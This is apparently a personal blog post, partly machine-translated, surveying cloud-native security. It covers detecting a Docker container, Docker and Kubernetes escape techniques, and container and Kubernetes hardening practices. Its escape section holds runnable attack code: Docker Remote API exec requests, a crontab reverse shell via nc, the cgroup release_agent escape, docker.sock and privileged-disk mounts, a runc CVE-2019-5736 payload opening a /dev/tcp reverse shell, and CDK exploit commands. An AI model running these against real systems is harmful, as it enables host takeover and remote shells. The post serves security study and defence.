ljluestc'Blog

Jan 23 2023

Table of Contents

Cloud Native Security
容器本身的信息收集
1. 判断当前机器是否为Docker容器环境
容器逃逸
k8s的安全问题
容器安全最佳实践
参考

Cloud Native Security

什么是Cloud Native Security

Cloud native (Cloud Native) is a set of technical system and methodology, which consists of two words, cloud (Cloud) and native (Native). Cloud (Cloud) means that the application is located in the cloud, rather than the traditional data center; Native (Native) means that the application is designed with the cloud environment in mind from the beginning, natively designed for the cloud, and runs optimally on the cloud , make full use of the flexibility and distributed advantages of the cloud platform.

Representative cloud-native technologies include containers, service mesh (Service Mesh), microservices (Microservice), immutable infrastructure, and declarative API.

Cloud Native Security的4个C

你可以分层去考虑安全性，Cloud Native Security的 4 个 C 分别是云（Cloud）、集群（Cluster）、容器（Container）和代码（Code）。

Each layer of the cloud-native security model builds on the next outermost layer, and the code layer benefits from a strong underlying security layer (cloud, cluster, container). You cannot protect against poor security standards in the base layer by addressing security at the code layer.

Security division according to different perspectives

Build-Deploy-Run

Build Time Security (Build)
- Operate regulatory container images in the form of a rule engine
  - Dockerfile
  - Suspicious files
  - Sensitive permissions
  - Sensitive ports
  - Basic software vulnerabilities
  - Business software
部署时安全(Deployment)
- Kubernetes
运行时安全(Runtime)
- HIDS

攻击前后

攻击前：裁剪攻击面，减少对外暴露的攻击面（本文涉及的场景关键词：隔离）；
攻击时：降低攻击成功率（本文涉及的场景关键词：加固）；
攻击后：减少攻击成功后攻击者所能获取的有价值的信息、数据以及增加留后门的难度等。

容器攻击面

Linux内核漏洞
- 内核提权
- 容器逃逸
容器自身
- CVE-2019-5736：runc - container breakout vulnerability
不安全部署(配置)
- 特权容器或者以root权限运行容器；
- 不合理的Capability配置（权限过大的Capability）。

容器本身的信息收集

判断当前机器是否为Docker容器环境

检查PID的进程名

如果该进程就是应用进程则判断是容器，而如果是 init 进程或者 systemd 进程，则不一定是容器，当然不能排除是容器的情况，比如 LXD 实例的进程就为/sbin/init。

ps -p1

检查内核文件

容器和虚拟机不一样的是，容器和宿主机是共享内核的，因此理论上容器内部是没有内核文件的，除非挂载了宿主机的/boot目录。

1 2	KERNEL_PATH=$(cat /proc/cmdline \| tr ' ' '\n' \| awk -F '=' '/BOOT_IMAGE/{print $2}') test -e $KERNEL_PATH && echo "Not Sure" \|\| echo "Container"

检查 /proc/1/cgroup 是否存在含有docker字符串，并且这条命令可以获取到docker容器的uuid。

1
2
3

cat /proc/1/cgroup

cat /proc/1/cgroup | grep -qi docker && echo "Docker" || echo "Not Docker"

检查根目录是否存在.dockerenv文件

容器是通过 cgroup 实现资源限制，每个容器都会放到一个 cgroup 组中，如果是 Docker，则 cgroup 的名称为docker-xxxx，其中xxxx为 Docker 容器的 UUID。而控制容器的资源，本质就是控制运行在容器内部的进程资源，因此我们可以通过查看容器内部进程为 1 的 cgroup 名称获取线索。

1
2
3

ls -la /.dockerenv

[[ -f /.dockerenv ]] && echo "Docker" || echo "Not Docker"

其他方式

sudo readlink /proc/1/exe
// 如果返回system字样则为宿主机

systemd-detect-virt -c
// 返回none则为宿主机

容器逃逸

用户层
- 用户配置不当
- 危险挂载
服务层: 容器服务自身缺陷(程序漏洞)
系统层: Linux内核漏洞

配置不当导致Docker逃逸

Docker Remote API 未授权访问

docker swarm

1	docker swarm 是一个将docker集群变成单一虚拟的docker host工具，使用标准的Docker API，能够方便docker集群的管理和扩展，由docker官方提供

docker swarm是管理docker集群的工具。主从管理、默认通过2375端口通信。绑定了一个Docker Remote API的服务，可以通过HTTP、Python、调用API来操作Docker。

漏洞环境搭建

使用vulhub搭建漏洞环境：docker daemon api 未授权访问漏洞

漏洞利用一容器RCE

获取主机上所有容器：

1	curl -i -s -X GET http://<docker_host>:PORT/containers/json

创建一个将在容器上执行的”exec”实例

POST /containers/<container_id>/exec HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json
Content-Length: 188

{
  "AttachStdin": true,
  "AttachStdout": true,
  "AttachStderr": true,
  "Cmd": ["cat", "/etc/passwd"],
  "DetachKeys": "ctrl-p,ctrl-q",
  "Privileged": true,
  "Tty": true
}

bash 命令

curl -i -s -X POST \
-H "Content-Type: application/json" \
--data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' \
http://<docker_host>:PORT/containers/<container_id>/exec

启动exec实例

POST /exec/<exec_id>/start HTTP/1.1
Host: <docker_host>:PORT
Content-Type: application/json

{
 "Detach": false,
 "Tty": false
}

bash命令

curl -i -s -X POST \
-H 'Content-Type: application/json' \
--data-binary '{"Detach": false,"Tty": false}' \
http://<docker_host>:PORT/exec/<exec_id>/start

漏洞利用二宿主机RCE

利用方法是，我们随意启动一个容器，并将宿主机的/etc目录挂载到容器中，便可以任意读写文件了。我们可以将命令写入crontab配置文件，进行反弹shell。

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

使用cdk进行漏洞利用

使用cdk直接执行命令：

1	./cdk run docker-api-pwn http://127.0.0.1:2375 "touch /host/tmp/docker-api-pwn"

挂在宿主机根目录/到容器内部/host，然后执行用户输入的指令来篡改宿主机的文件，比如可以写/etc/crontab来搞定宿主机。

参考：Exploit: docker api pwn

Docker 高危启动参数 –privileged 特权模式启动容器

原因

当操作者执行docker run --privileged时，When the operator executes docker run --privileged, Docker will allow the container to access all devices on the host, and at the same time modify the configuration of AppArmor or SELinux so that the container has almost the same access rights as those processes running directly on the host.

环境搭建

1	sudo docker run -itd --privileged ubuntu:latest /bin/bash

漏洞利用

查看磁盘文件: fdisk -l
新建目录以备挂载: mkdir /aa
将宿主机/dev/sda1目录挂载至容器内 /aa: mount /dev/sda1 /aa
即可写文件获取权限或数据

使用cdk：

1	./cdk run mount-disk

Docker 高危启动参数 –cap-add=SYS_ADMIN 利用

Docker 通过Linux namespace use Docker implements 6 resource isolation through Linux namespace, including host name, user authority, file system, network, process number, and inter-process communication. However, some startup parameters grant greater permissions to the container, thus breaking the boundary of resource isolation.

--cap-add=SYS_ADMIN  启动时，允许执行mount特权操作，需获得资源挂载进行利用。
--net=host           启动时，绕过Network Namespace
--pid=host              启动时，绕过PID Namespace
--ipc=host              启动时，绕过IPC Namespace

前提：

在容器内root用户
容器必须使用SYS_ADMIN Linux capability运行
容器必须缺少AppArmor配置文件，否则将允许mount syscall
cgroup v1虚拟文件系统必须以读写方式安装在容器内部

我们需要一个cgroup，可以在其中写入notify_on_release文件(for enable cgroup notifications)，挂载cgroup控制器并创建子cgroup，创建/bin/sh进程并将其PID写入cgroup.procs文件，sh退出后执行release_agent文件。

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash
# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ls > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

查看导出的文件

1 2	ls /tmp/cgrp cat /output

危险挂载导致Docker逃逸

挂载目录（-v /:/soft）

1	docker run -itd -v /dir:/dir ubuntu:18.04 /bin/bash

挂载 Docker Socket

逃逸复现

首先创建一个容器并挂载/var/run/docker.sock

1	docker run -itd -v /var/run/docker.sock:/var/run/docker.sock ubuntu

在该容器内安装Docker命令行客户端

apt-update
apt-get install \
apt-transport-https \
ca-certificates \
curl \
gnupg-agent \
software-properties-common
curl -fsSL https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
add-apt-repository \
"deb [arch=amd64] https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/ \
$(lsb_release -cs) \
stable"
apt-get update
apt-get install docker-ce docker-ce-cli containerd.io

接着使用该客户端通过Docker Socket与Docker守护进程通信，发送命令创建并运行一个新的容器，将宿主机的根目录挂载到新创建的容器内部

1	docker run -it -v /:/host ubuntu:18.04 /bin/bash

在新容器内执行chroot将根目录切换到挂载的宿主机根目录。

1	chroot /test

使用cdk工具执行命令：

1	./cdk run docker-sock-pwn /var/run/docker.sock "touch /host/tmp/pwn-success"

挂载 procfs 目录

关于procfs

procfs是一个伪文件系统，它动态反映着系统内进程及其他组件的状态，其中有许多十分敏感重要的文件。因此，将宿主机的procfs挂载到不受控的容器中也是十分危险的，尤其是在该容器内默认启用root权限，且没有开启User Namespace时

漏洞利用过程比较复杂，但是可以通过cdk快速利用。example:

宿主机启动测试容器，挂载宿主机的procfs，尝试逃逸当前容器。docker run -v /root/cdk:/cdk -v /proc:/mnt/host_proc –rm -it ubuntu bash
容器内部执行 ./cdk run mount-procfs /mnt/host_proc “touch /tmp/exp-success”
宿主机中出现/tmp/exp-success文件，说明exp已经成功执行，攻击者可以在宿主机执行任意命令。

参考：Exploit: mount procfs

挂载 cgroup 目录

使用cdk进行利用

1	./cdk run mount-cgroup "<shell-cmd>"

程序漏洞导致Docker逃逸

CVE-2019-5736 runc容器逃逸漏洞

漏洞详情

Docker、containerd或者其他基于runc的容器运行时存在安全漏洞，攻击者通过特定的容器镜像或者exec操作可以获取到宿主机的runc执行时的文件句柄并修改掉runc的二进制文件，从而获取到宿主机的root执行权限。

影响范围

Docker版本 < 18.09.2
runc版本 <= 1.0-rc6。

利用步骤

使用POC：

POC: CVE-2019-5736-PoC

修改payload

1 2	vi main.go payload = "#!/bin/bash \n bash -i >& /dev/tcp/192.168.172.136/1234 0>&1"

编译

1	CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

Compile

1	CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

Copy to the docker container for execution
Wait for the victim to connect to the container using docker exec
Received a rebound shell

CVE-2019-14271 Docker cp command container escape attack vulnerability

Vulnerability details

When the Docker host uses the cp command, it will call the auxiliary process docker-tar, which is not containerized, and will dynamically load some libnss.so libraries at runtime. Hackers can inject code into docker-tar by replacing libraries such as libnss.so in the container. When a Docker user tries to copy a file from a container, malicious code will be executed, and the Docker escape will be successfully achieved and the root privilege of the host machine will be obtained.

Range of Influence

Docker 19.03.0

Vulnerability Reference

Docker Patched the Most Severe Copy Vulnerability to Date With CVE-2019-14271

CVE-2019-13139 Docker build code execution

Vulnerability Reference

CVE- 2019-13139 - Docker build code execution

Kernel vulnerability causes Docker-escape

DirtyCow(CVE-2016-5195) Dirty Cow Vulnerability Realizes Docker Escape

Vulnerability Description

1	Dirty Cow (CVE-2016-5195) is a privilege escalation vulnerability in the Linux kernel, through which the Docker container can escape and obtain a shell with root privileges .

Docker shares the kernel with the host, so the container needs to be in the host with the dirtyCow vulnerability.

Vulnerability reproduction

Environment acquisition: git clone https://github.com/ gebl/dirtycow-docker-vdso.git

Tools use CDK

CDK : https://github.com/cdk-team/CDK

Copy to container

1
 2
3
4
5< /span>
6
7

# host
docker cp /Users/ ljluestc/Downloads/cdk_linux_amd64 e39eb7abd9e6:/root

# Container< /span>
cd /root
mv cdk_linux_amd64 cdk
chmod 777 cdk

Common commands

1
 2
3
4
5< /span>
6
7
8

# Information Collection 
cdk evaluate

# list all exp
cdk run --list

# Execute the specified exp
cdk run <script-name> [ options]

k8s security issue

Through the detection items of cdk's evaluate, you can look at the security issues of k8s.

k8s builds a stepping pit

Reference:

First install k8s through docker-desktop, refer to: https ://github.com/maguowei/k8s-docker-desktop-for-mac

Install k8s kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/v2.2.0/aio/deploy/recommended.yaml

Enable local proxy kubectl proxy

Visit http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/

Get the token in the following steps

Install helm

brew install helm
helm repo add stable http://mirror.azure.cn/kubernetes/ charts/
helm repo update
helm install my-mysql stable/mysql

Create a user:

1	kubectl apply -f dashboard-adminuser.yaml

The content of dashboard-adminuser.yaml is as follows:

1
 2
3
4
5< /span>

apiVersion: v1
kind: ServiceAccount
metadata:
 name: admin-user
 namespace: kube-system

Get token

1	kubectl -n kube-system describe secret $(kubectl -n kube-system get secret \| grep admin-user \| awk ''''&# 123;print $1}')

kube-proxy border bypass (CVE-2020-8558)

An attacker may obtain interface information through a container on the same LAN, or through a cluster node accessing an adjacent node under the same Layer 2 domain to bind and monitor the TCP/UDP service on the local port 127.0.0.1.

For detailed introduction, please refer to: CVE-2020-8558: Kubernetes local host boundary Bypassing Vulnerability Notice

List services that may be affected:

1 2	lsof +c 15 -P -n -i4TCP@127.0.0.1 - sTCP:LISTEN lsof +c 15 -P -n -i4UDP@127.0.0.1

K8s Api-server

Check the ENV information to determine whether the current container belongs to the K8s Pod, obtain the connection address of the K8s api-server and try to log in anonymously. If successful, it means that the K8s cluster can be directly taken over through the api-server.

Reference: https:// github.com/cdk-team/CDK/wiki/Evaluate:-K8s-API-Server

The premise is that k8s must support anonymous login, which does not support anonymous login by default. If this problem exists, you can use cdk kcurl anonymous to initiate an HTTP request.

K8s Service Account

In the Pod created by the K8s cluster, the authentication credential of the K8s Service Account (/run/secrets/kubernetes.io/serviceaccount/token) is carried inside the container by default. CDK will use this credential to try to authenticate the K8s api-server server and access the high-level Permissions interface, if the execution is successful, it means that the account has high permissions, and you can directly use the Service Account to manage the K8s cluster.

The test is as follows:

-w869

Connect to K8s api-server through cdk to initiate a custom HTTP request:

First use cdk evaluate to determine whether this problem exists

-w829

Get the api-server address of k8s again:

-w526

Then request via cdk kcurl

-w866

Then use CDK to deploy backdoor Pod and shadow k8s api-server.

Container Security Best Practices
This part is translated from the Internet and will be sorted out later.

Container

Always use the latest version of Docker

Only allow trusted users to control the Docker daemon

Ensuring that there are rules in place, can provide a review of the following

Docker daemon

/var/lib/docker

/etc/docker

Docker.service

Docker.socket

/etc/default/docker

/etc/docker/daemon.json

/etc/sysconfig/docker

/usr/bin/containerd

/usr/sbin/runc

Ensure all Docker files and directories are owned by an appropriate user (usually root) and set their file permissions to restrictive values to protect all Docker files and directories

Use a registry with a valid registry certificate or a registry that uses TLS to minimize the risk of traffic interception.

If you are using containers that do not have an explicit container user defined in the image, you should enable user namespace support, which will allow you to remap container users to host users.

Prevents the container from acquiring new privileges. By default, containers are allowed to acquire new privileges, so this configuration must be set explicitly. Another step you can take to minimize privilege escalation attacks is to remove setuid and setgid permissions from the image.

Run the container as a non-root user (UID not 0). By default, containers run as the root user inside the container.

When building containers, use only trusted base images.

Use a minimal base image that does not contain unnecessary packages that could lead to a larger attack surface.

Implement strong governance policies to enforce frequent image scanning.

Build a workflow that periodically identifies and removes stale or unused images and containers from the host.

Do not store secrets in the image/Dockerfile. By default, you are allowed to store secrets in a Dockerfile, but storing a secret in an image will make the secret accessible to any user of that image.

When running a container, remove any capabilities that are required for the container to function as desired.

Do not run containers with the --privileged flag, as this type of container will have most of the capabilities available to the underlying host. This flag will also override any rules you have set with CAP DROP or CAP ADD. (Add --no-new-privileges flag to always run docker images with --security-opt=no-new-privileges to prevent privilege escalation with setuid or setgid binaries.)

Do not mount sensitive host system directories on containers, especially in writable mode, as this may expose them to malicious changes that could compromise the host.

Don't run sshd inside the container. By default, the ssh daemon will not run in the container, and you should not install the ssh daemon to simplify security management of the SSH server

Do not map any ports below 1024 inside the container, as they transmit sensitive data and are therefore considered privileged ports. By default, Docker will map container ports to ports in the range 49153-65525, but it allows mapping containers to privileged ports. As a general rule of thumb, make sure you only open the ports you need on your containers.

Do not share the host's network namespace, process namespace, IPC namespace, user namespace, or UTS namespace unless necessary to ensure proper isolation between Docker containers and the underlying host.

Specify the amount of memory and CPU the container needs to run as designed, rather than relying on arbitrary amounts. By default, Docker containers share their resources equally without restriction.

Set the container's root filesystem to read-only. Once running, the container does not need to change the root filesystem. Any changes made to the root filesystem may be for malicious purposes. In order to preserve container immutability - not patching a new container but recreating it from a new image - you should not make the root filesystem writable.

PID limits are imposed. One of the advantages of containers is strict process identifier (PID) control. Every process in the kernel hosts a unique PID, and containers leverage the Linux PID namespace to provide each container with a separate view of the PID hierarchy. Setting limits on PIDs effectively limits the number of processes running in each container. Limiting the number of processes in a container prevents the spawning of new processes and potentially malicious lateral movement. Imposing PID limits also protects against fork bombs (processes that keep replicating themselves) and abnormal processes. Typically, the benefit of this is that if your service is always running a certain number of processes, setting the PID limit to that exact number can mitigate many malicious behaviors, including reverse shells and remote code injections – in fact,

Do not configure your mount propagation rules to share. Shared mount propagation means that any changes made to a mount will be propagated to all instances of that mount. Instead, set mount propagation to slave or private mode so that necessary changes to the volume are not shared with (or propagated to) containers that do not require the change.

Do not use the docker exec command with the private or user=root options, as this setting enables extended Linux capabilities to the container

Do not use the default bridge "docker0". Using the default bridge allows you to easily deal with ARP spoofing and MAC flooding attacks. Instead, containers should be on a user-defined network instead of the default "docker0" bridge.

Do not mount the Docker socket inside the container, as this approach will allow the process inside the container to execute commands, giving it complete control over the host machine.

Rule 5 - Disallow inter-container communication (–icc = false)

Use Linux security modules (seccomp, AppArmor or SELinux)

Rule 7 - Limit resources (memory, CPU, file descriptors, processes, restarts)

Rule #8 - Make filesystems and volumes read-only

Rule 10 - Set logging level to at least INFO¶

Kubernetes Security Best Practices

For RBAC, specify your Roles and ClusterRoles for specific users or user groups instead of granting cluster-admin privileges to any user or user group.

Avoid duplicating permissions when using Kubernetes RBAC, as doing so may cause operational issues.

Delete unused or inactive RBAC roles to focus on active roles when troubleshooting failures or investigating security incidents.

Use Kubernetes network policies to isolate your pods and explicitly allow the communication paths required for your application to function properly. Otherwise, you have both lateral and north-south threats.

If your pod requires internet access (ingress or egress), then create an appropriate network policy to enforce proper network segmentation/firewall rules, then create a label for that network policy, and finally connect your pod to that Label association.

Using the PodSecurityPolicy admission controller can ensure that proper management policies are enforced. PodSecurityPolicy controllers can prevent containers from running as root, or ensure that a container's root filesystem is mounted read-only (these suggestions sound familiar, since they were all on the previous list of Docker actions to take).

Use a Kubernetes admission controller to enforce image registry management policies so that all images fetched from untrusted registries are automatically rejected.

How many images are there on a host whose last scan date is more than 60 days old?

How many images/containers have high-severity vulnerabilities?

Which deployments are affected by these highly-severity vulnerable containers?

Are there any containers in the affected deployment that store secrets?

Are any vulnerable containers running as root or privileged flags?

Are there any vulnerable containers in the pod that don't have a network policy (meaning it allows all communication) associated with it?

Are any containers running in production affected by this vulnerability?

Where did the images we are using come from?

How do we block images pulled from untrusted registries?

Can we see what processes are being executed while the container is running?

Which clusters, namespaces and nodes do not meet the CIS benchmark for Docker and Kubernetes?

Dockerfile issues that need attention

Make sure USER is specified

Make sure the base image version is fixed

Make sure the OS package version is pinned

Avoid using ADD, try to use COPY

Avoid using `apt/apk upgrade`

Avoid calling curl to get the bash file in the RUN command

静态分析工具

https://github.com/coreos/clair

https://github.com/aquasecurity/trivy

https://snyk.io/

https://anchore.com/opensource/

https://github.com/aquasecurity/microscanner

https://jfrog.com/xray/

https://www.qualys.com/apps/container-security/

https://www.inspec.io/docs/reference/resources/docker/

https://dev-sec.io/baselines/docker/

k8s config扫描工具

https://github.com/Shopify/kubeaudit

https://kubesec.io/

https://github.com/aquasecurity/kube-bench

参考

美团技术团队-云原生之容器安全实践

Cloud Native Security概述-Kubernetes

Container Security:Going Beyond Image Scanning

Docker Container Security 101: Risks and 33 Best Practices

Docker安全备忘单

[https://resources.whitesourcesoftware.com/blog-whitesource/docker-container-security](Docker Container Security: Challenges and Best Practices)

Docker逃逸小结第一版更新

渗透测试之Docker逃逸

CDK Home CN

【云原生攻防研究】容器逃逸技术概览

容器逃逸技术概览